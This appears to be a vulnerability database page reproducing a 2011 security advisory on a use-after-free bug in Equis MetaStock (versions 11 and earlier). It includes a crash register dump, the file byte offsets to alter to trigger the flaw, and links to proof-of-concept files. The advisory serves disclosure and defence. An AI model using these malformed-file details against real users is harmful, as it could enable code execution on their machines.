Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Equis MetaStock <= 11 Use After Free

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 26 Views

Equis MetaStock use after free vulnerability in versions <= 11 on Window

Code

                                                #######################################################################

                             Luigi Auriemma

Application:  Equis MetaStock
              http://www.equis.com
Versions:     &#60;= 11
Platforms:    Windows
Bug:          use after free
Exploitation: file
Date:         06 Sep 2011
Author:       Luigi Auriemma
              e-mail: [email protected]
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


MetaStock is the most used and awarded software for performing
technical analysis of stocks, futures, forex, commodities, indices and
other financial instruments.


#######################################################################

======
2) Bug
======


All the files supported by MetaStock (mwc/mws charts, mwt templates and
mwl layout) cause an use-after-free vulnerability exploitable through
invalid and malformed files:

  eax=41414141 ebx=73eccedd ecx=01028620 edx=00000004 esi=010283c0 edi=0012e748
  eip=00486378 esp=0012deb0 ebp=0012e754 iopl=0         nv up ei pl nz na po nc
  cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
  Mswin+0x86378:
  00486378 ff5004          call    dword ptr [eax+4]    ds:0023:41414145=????????

Modified bytes:
0000308B   1E       40
00003214   74       41      ; eax 0x41414141 on Windows 2003 Server
00003215   69       41
00003216   76       41
00003217   65       41


#######################################################################

===========
3) The Code
===========


http://aluigi.org/poc/metastock_1.mwl
http://www.exploit-db.com/sploits/17836.mwl


#######################################################################

======
4) Fix
======


No fix.


#######################################################################

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
equis metastockuse after freevulnerabilitywindowsluigi auriemmaexploitationfiletechnical analysisstocksfuturesforexcommoditiesindicesfinancial instruments
26